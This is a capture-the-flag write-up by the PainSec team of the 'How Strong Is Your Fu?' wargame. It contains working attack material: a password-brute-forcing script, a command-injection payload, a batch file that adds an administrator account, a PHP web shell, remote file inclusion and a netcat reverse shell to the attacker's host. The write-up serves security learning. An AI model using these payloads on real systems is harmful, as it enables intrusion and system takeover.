How Strong Is Your Fu? http://www.painsec.com/



Similar documents
Penetration Testing with Kali Linux

STABLE & SECURE BANK lab writeup. Page 1 of 21

Penetration Testing Report Client: Business Solutions June 15 th 2015

Secure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification

Lab 7 - Exploitation 1. NCS 430 Penetration Testing Lab 7 Sunday, March 29, 2015 John Salamy

The purpose of this report is to educate our prospective clients about capabilities of Hackers Locked.

dotdefender v5.12 for Apache Installation Guide Applicure Web Application Firewall Applicure Technologies Ltd. 1 of 11 support@applicure.

Windows Remote Access

Running a Default Vulnerability Scan SAINTcorporation.com

Penetration Testing Lessons Learned. Security Research

Advanced Web Security, Lab

Running a Default Vulnerability Scan

Livezilla How to Install on Shared Hosting By: Jon Manning

Vulnerability Assessment and Penetration Testing

Network Security In Linux: Scanning and Hacking

Learn Ethical Hacking, Become a Pentester

Using Nessus In Web Application Vulnerability Assessments

How to hack a website with Metasploit

Andreas Dittrich, Philipp Reinecke Testing of Network and System Security. example.

ABC LTD EXTERNAL WEBSITE AND INFRASTRUCTURE IT HEALTH CHECK (ITHC) / PENETRATION TEST

Web Application Threats and Vulnerabilities Web Server Hacking and Web Application Vulnerability

1 Recommended Readings. 2 Resources Required. 3 Compiling and Running on Linux

1 hours, 30 minutes, 38 seconds Heavy scan. All scanned network resources. Copyright 2001, FTP access obtained

Domain Name. Domain Registrar. Web Site cpanel URL: Username: Password: Username: Password:

Smartphone Pentest Framework v0.1. User Guide

WHY USE ILLUMIN8 MARKETING FOR HOSTING YOUR WEB SITE?

Content Management System

Configuring MailArchiva with Insight Server

PTSv2 in pills: The Best First for Beginners who want to become Penetration Testers. Self-paced, online, flexible access

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Security Correlation Server Quick Installation Guide

User Guide. Version 3.2. Copyright Snow Software AB. All rights reserved.

Penetration: from Application down to OS

VoipSwitch Security Audit

Command Line Crash Course For Unix

Getting Started With Your Virtual Dedicated Server. Getting Started Guide

Pen Test Tips 2. Shell vs. Terminal

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

My FreeScan Vulnerabilities Report

WEB APPLICATION HACKING. Part 2: Tools of the Trade (and how to use them)

Web Application Vulnerability Testing with Nessus

THE OPEN UNIVERSITY OF TANZANIA

Getting Started With Your Virtual Dedicated Server. Getting Started Guide

The current version installed on your server is el6.x86_64 and it's the latest available.

Hardening Joomla 1. HARDENING PHP. 1.1 Installing Suhosin. 1.2 Disable Remote Includes. 1.3 Disable Unneeded Functions & Classes

Web Application Security

ASL IT SECURITY BEGINNERS WEB HACKING AND EXPLOITATION

IIS, FTP Server and Windows

Client logo placeholder XXX REPORT. Page 1 of 37

Getting started with OWASP WebGoat 4.0 and SOAPUI.

Linux VPS with cpanel. Getting Started Guide

Firewalls and Software Updates

Lecture 11 Web Application Security (part 1)

Common Security Vulnerabilities in Online Payment Systems

File Transfer Examples. Running commands on other computers and transferring files between computers

Project 2: Penetration Testing (Phase II)

1. Introduction. 2. Web Application. 3. Components. 4. Common Vulnerabilities. 5. Improving security in Web applications

AXIGEN Mail Server. Quick Installation and Configuration Guide. Product version: 6.1 Document version: 1.0

External Vulnerability Assessment. -Technical Summary- ABC ORGANIZATION

1. LAB SNIFFING LAB ID: 10

Active Directory - User, group, and computer account management in active directory on a domain controller. - User and group access and permissions.

Installation Instructions

ISPConfig Documentation

42goISP Documentation

qliqdirect Active Directory Guide

Web Application Security Payloads. Andrés Riancho Director of Web Security OWASP AppSec USA Minneapolis

Parallels Plesk Panel 11 for your Linux server

UFTP AUTHENTICATION SERVICE

Black Box Penetration Testing For GPEN.KM V1.0 Month dd "#$!%&'(#)*)&'+!,!-./0!.-12!1.03!0045!.567!5895!.467!:;83!-/;0!383;!

If you examine a typical data exchange on the command connection between an FTP client and server, it would probably look something like this:

Extending Remote Desktop for Large Installations. Distributed Package Installs

Hacking the WordpressEcosystem

FTP, IIS, and Firewall Reference and Troubleshooting

Reference and Troubleshooting: FTP, IIS, and Firewall Information

ANNEXURE-1 TO THE TENDER ENQUIRY NO.: DPS/AMPU/MIC/1896. Network Security Software Nessus- Technical Details

Security Threat Kill Chain What log data would you need to identify an APT and perform forensic analysis?

Introduction to Computer Security

Lesson 7 - Website Administration

Project 2: Web Security Pitfalls

A Tiny Queuing System for Blast Servers

WWPass External Authentication Solution for IBM Security Access Manager 8.0

Configuring Web services

The Web Pro Miami, Inc. 615 Santander Ave, Unit C Coral Gables, FL T: info@thewebpro.com

Linux Firewalls (Ubuntu IPTables) II

Online Backup Client User Manual

Webapps Vulnerability Report

Customer Control Panel Manual

Online Backup Client User Manual Mac OS

Online Backup Client User Manual Mac OS

FTP Use. Internal NPS FTP site instructions using Internet Explorer:

Penetration Testing: Lessons from the Field

IGEL Universal Management. Installation Guide

CS 361S - Network Security and Privacy Fall Project #1

Online Vulnerability Scanner Quick Start Guide

RoboMail Mass Mail Software

Getting Started Guide. Getting Started With Your Dedicated Server. Setting up and hosting a domain on your Linux Dedicated Server using Plesk 8.0.

HELP DOCUMENTATION SSRPM WEB INTERFACE GUIDE

Using Internet or Windows Explorer to Upload Your Site

Transcription:

. How Strong Is Your Fu? http://www.painsec.com/

Contents 1 Phase 1: The noob filter 3 2 Phase 2: Serious Business 5 2.1 killthen00b challenge...................................... 5 2.2 ghost Challenge........................................ 7 We are: bnull (bnull@painsec.com, http://www.twitter.com/bnull) Boken (boken@painsec.com) Dade (dade@painsec.com, http://www.twitter.com/jcarriba) firl (firl@painsec.com) HockeyInJune (hockeyinjune@painsec.com) knx (knx@painsec.com, http://www.twitter.com/knithx) Kuze (kuze@painsec.com) NighterMan (nighterman@painsec.com, http://www.twitter.com/nighterman) SakeBomb (sakebomb@painsec.com, http://twitter.com/sak3bomb) Shaddy (shaddy@painsec.com) Contact us at painsec@painsec.com, http://twitter.com/painsecurity 2

1 Phase 1: The noob filter When visiting http://www1.noob-filter.com we are required to enter a valid username and password into a form in order to access some content, under the leet message Can you hack me?. As the form is the only alternative to hack into the webpage (no other relevant details are worth mentioning from the sourcecode) we proceed to do a quick SQL-Injection test inserting a simple quote in both form fields. When submitting the form, we are redirected to an error page with a HAHAHA!! text as the only content. After many tests, this was the only interesting result we could get. Checking the sourcecode of this same page we can find a very distinctive sentence in the description label: Applicure is the leading provider of web application security. We create products for web application protection, including web application firewall, ISA security and IIS security. Doing a Google search for Applicure and visiting their official website 1 we find out we are talking about a company that offers some WAF (this is, web application firewall) technology called dotdefender. We then proceeded to download and install a copy of this software on our computer to watch its behaviour. From the installation we could see that the default installation directory was /dotdefender. We tried to mimic our installation on the challenge webpage: http://www1.noob-filter.com/dotdefender And... Bingo! A web authentication popup shows up. We are said in it that we must use admin as the username. As we don t have any clue about what the password could be, we developed a Bash script to perform a dictionary attack on this auth: #!/ bin / bash # PAINSEC web login fuzzer used in " How Strong is your Fu? if [ $# -ne 1 ] then echo " Usage : basename $0 <dictionary >" exit -1 fi # We loop all over the dictionary for i in cat $1 do # We know the user is admin... curl -u admin :$i http :// www1.noob - filter. com / dotdefender > tmp 2> / dev / null # " Required " is our blind keyword if grep Required tmp > / dev / null ; then echo " Not $i... " else # Good news :) echo " Found! $i" exit fi done rm tmp When running it with OpenWall lowercase passwords wordlist 2, we can see the password is passwords. 1 http://www.applicure.com/ 2 ftp://ftp.openwall.com/pub/wordlists/passwords/lower.gz 3

We are inside dotdefender s control panel. Now what? Fuzzing around, we can t see any hints or interesting data which could be the challenge key we are searching (which is supposed to be inside a file called n00bsecret.txt). What if we have to exploit in some way dotdefender to access the underlying system? This hypothesis became stronger as we find a Arbitrary Remote Code Execution exploit on exploitdb: http://www.exploit-db.com/exploits/10261 As the paper says, we can inject code via a GET parameter called deletesitename. As we have to find a file called n00bsecret.txt and output this content, injecting the command cat $(find / -name n00bsecret.txt) should do the work: sitename=dotdefeater&deletesitename=dotdefeater;cat $(find / -name n00bsecret.txt);&action=deletesite&linenum=15 Great! The content of the file, in other words, the challenge key, is dumped: 5f5f3ea014b42c98530beefabce44e35b896e39567ac8d811d0982afd5e2acfd 66ec854bd5b81672ef9f441f5e00ae7a25b7a7754e1644058777e7f7cfbb905d So this is what we did: SQL Error dotdefender disclosure Command injection Wordlist attack Let s hack Phase 2 :) 4

2 Phase 2: Serious Business 2.1 killthen00b challenge When requesting http://192.168.6.70 (or any of its clones) a default website from Surgemail Webmail 3 is shown. First of all, we scanned the machine ports in order to find something interesting: 21/ tcp open ftp _ftp - anon : Anonymous FTP login allowed 25/ tcp open smtp Surgemail smtpd 3.8 k4-4 80/ tcp open http Surgemail webmail ( DNews based ) _html - title : SurgeMail Welcome Page 106/ tcp open pop3pw Qualcomm poppassd ( Maximum users connected ) 110/ tcp open pop3 SurgeMail pop3d 3.8 k4-4 143/ tcp open imap SurgeMail imapd 3.8 k4-4 366/ tcp open smtp Surgemail smtpd 3.8 k4-4 465/ tcp open tcpwrapped 587/ tcp open smtp Surgemail smtpd 3.8 k4-4 993/ tcp open tcpwrapped 995/ tcp open tcpwrapped 3389/ tcp open ms -term - serv? 7025/ tcp open tcpwrapped 7443/ tcp open tcpwrapped We tried to connect to the different ports used by Surgemail. When connecting to port 143/IMAP, we came up to a banner showing Surgemail s version used: 3.8k4-4. With this info, we searched for known vulnerabilities and luckily we found an exploit to the same version that could lead us to get a shell of the system: http://www.exploit-db.com/exploits/5259 The vulnerability needed some valid credentials to be exploited, so we looked for a method to enumerate users of webmail, i.e through the remember your password feature of the webmail. As we weren t able to find a way to get a valid user, we moved to explore the FTP, which the organization had given us credentials to log in. After some minutes of exploring it, we noticed that there was a directory transversal vulnerability, that allowed us to explore the whole filesystem. We noticed Surgemail files were all cgi s, so we tried to find the directory where they were stored and upload a.bat script to add an user to the system administrators group. We had previously seen that Terminal Server was open on the system, so if we could add an user, we would be able to connect through it. We found the cgi directory on /surgemail/scripts/, so we uploaded the bat script as we had write permissions on it through the FTP PUT command. The content of the script we uploaded was the following: net user painsec painsecpass / add net localgroup administrators painsec / add After adding the user to the system (just pointing our browser to http://192.168.6.70/scripts/s.bat), we connected to it through RDP (Remote Desktop, rdesktop -a 8 192.168.6.70), and found the challenge key file inside the proof.txt file on Administrator s desktop: 3 http://netwinsite.com/surgemail 5

a61b0c1bf71267289efeecf778b1e51e Thanks to the FTP directory transversal, were also able to retrieve user credentials for the webmail client on c:/surgemail/nwauth.clg and c:/surgemail/admin.dat files, and cracked killthenoob account to find pippo123 password. However, this information was not useful at all, since the the exploit we mentioned at the beginning of this section needed (in addition to a valid credential we already had) to exploit a system buffer overflow that Windows 7 protections would stop. 6

2.2 ghost Challenge When accessing 192.168.6.66 machine we are given a form, which is (at least at first sight) not vulnerable to any kind of SQL-Injection attacks. After a lot of tries around the index (the form itself, some simple analysis of the image) we decided to do some fuzzing on any other possible web directories we could find. We downloaded wfuzz 4 directories wordlist, and proceeded to develop a Bash script to see what we could find: #!/ bin /sh # PAINSEC, Web fuzzer developed for How Strong is Your Fu? # Check syntax if [ $# -ne 2 ] then echo " Usage : basename $0 <dictionary > < output file >" exit -1 fi echo -n "" > temp. txt # Loop over all dictionary for i in cat $1 do # Get the page, dump the header to " header. txt " curl -D header. txt http :// localhost :8080/ $i > / dev / null 2> / dev / null # Write header status to screen and file echo -n -e "$i\t\t\t" cat header. txt head -n 1 echo -n -e " $i\ t\ t" >> temp. txt cat header. txt head -n 1 >> temp. txt done # Finished, remove temporal files and save no -404 results in output file rm header. txt cat temp. txt grep -v 404 > $2 rm temp. txt We could have used pipper 5 for this purpose too (see figure 2). After a couple of minutes, we collected the following results: 1 : Another form! Different than the first one. bak: Random image, generated by javascript. index: Same as 1. javascript: Some javascript code. It just generates some random image URL s to show in /test and others. login: Same form as root directory. test: Random image, generated by javascript. vti bin: Empty. vti cnf : Empty. vti pvt: Empty. vti txt: Empty. iissamples: Some empty files. As the most promising directory was /1, we repeated the fuzzing inside with the above mentioned script, obtaining: 4 http://www.edge-security.com/wfuzz.php 5 http://yoire.com/downloads.php?tag=pipper 7

1 : A cat image :) index: Same form. install: Simple Text-File Login script (SiTe- FiLo) 1.0.6 install file. launch: Simple Text-File Login script (SiTe- FiLo) 1.0.6 launch file. old: The list of images called by javascript. readme: Simple Text-File Login script (SiTe- FiLo) 1.0.6 readme file. version: Simple Text-File Login script (SiTe- FiLo) 1.0.6 version file. Figure 1: Pipper discovering web directories Yup! So we successfully identified the login engine behind /1/index.asp form thanks to the install, launch, readme and version files: Simple Text-File Login script (SiTeFiLo) 1.0.6 6. First thing we do is search for public exploit advisories: The most simple one allowed anyone to read the clear-text file slog users.txt where passwors are actually stored. Since this file was customized (being its only content :P ) we were glad to find another vulnerability (Remote File Inclusion): http://www.exploit-db.com/exploits/7444 As we can read, the RFI vulnerability can be exploited using the slogin path GET variable of the slogin lib.inc.php file. 6 http://www.mariovaldez.net/software/sitefilo/ 8

The most powerful way to exploit a RFI vulnerability is to include a PHP shell: this is, a PHP script whose GET parameter is a command to be executed on the server. Please note that the vulnerable parts of the code are the several variable-dependent include once PHP directives: if ( $slogin_logout ) { fslogin_log_user ("{ $slogin_text [ $slogin_lang ][" UserLoggedOut "]} $slogin_loginname "); @session_unset (); @session_destroy (); if ( $slogin_logoutredirect ) { if ( strtoupper ( $slogin_loginname )!= SLOGIN_ADMIN_USERNAME ) { header (" Location : ". $slogin_logoutredirect ); exit ; } } include_once ( $slogin_path. " header. inc. php "); // RFI!!! include_once ( $slogin_path. " slogin. inc. php "); //!!! include_once ( $slogin_path. " footer. inc. php "); //!!! exit ; } else { if (( $slogin_noauthpage!= 1) ( $slogin_explicitauth )) { if ((! $slogin_username ) && (! $slogin_password )) { if ((! $slogin_loginname ) && (! $slogin_loginpass )) { include_once ( $slogin_path. " header. inc. php "); //!!! include_once ( $slogin_path. " slogin. inc. php "); //!!! include_once ( $slogin_path. " footer. inc. php "); //!!! exit ; } else {... Since header.inc.php will be hardcoded to our shell filename, we just rename or shell to, simply, header.inc.php (so we just have to specify the directory and the command via shell s GET parameter). The content of this file is trivial: <?php system($ GET[ cmd ]);?> Using our VPN machine as the shell host, the inclusion of the shell remains as follow: /1/slogin lib.inc.php?slogin path=http://192.168.6.138/&cmd=desired COMMAND 7 Because injecting commands directly on the URL is quite uncomfortable, we start a listening netcat on our VPN machine (netcat -l -p 4444) and connect to it from the RFI injection (this is call a reverse shell): /1/slogin lib.inc.php?slogin path=http://192.168.6.138/&cmd=netcat 192.168.6.138 4444 -e /bin/bash Now we have an interactive shell ready to use on our VPN machine: Next step would be to search the file where the challenge key is stored. We tried several commands to search relevant files on the whole system: find / -print find / -print xargs grep admin find / -print xargs grep pass find / -print xargs grep md5 find / -print xargs grep root dmesg; fdisk -l 7 Note that 192.168.6.138/ would be completed as 192.168.6.138/header.inc.php because of the include once syntax, which is exactly our PHP shell file. cmd is shell s GET variable. 9

Figure 2: Interactive shell from a listening netcat on the victim machine... With any luck. From this point we ran into the hypothesis that we should elevate our privileges in the system (i.e. become root) in some way to access the file. After a lot of exploit downloading and testing (sudo, kernel leakage, kernel pipe exploit...), we have success in our task of becoming root with the next ext4 filesystem exploit: http://xorl.wordpress.com/2010/01/01/cve-2009-4131-linux-kernel-ext4-ioctl-insufficient-checks/ Figure 3: Becoming root in ghost 10

Great! Root access! Last step to complete this great challenge was to head to /root and retrieve the key. Web fuzzing SiTeFiLo disclosure Linux Privilege escalation RFI Shell Attack Just as a bonus, first tests told us this server was running IIS, and the first form (where we spend hours) was just a redirection to itself (clearly not vulnerable!). Also, there was another way to get root on the system: Although fstab didn t declared any reiserfs partitions mounted, it was possible to mount one on /apachelogs, and then apply a local root exploit related to this filesystem, which is related in the following paper: http://www.exploit-db.com/exploits/12130 With this last step we had completed all challenges of this incredibly awesome wargame :D 11

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information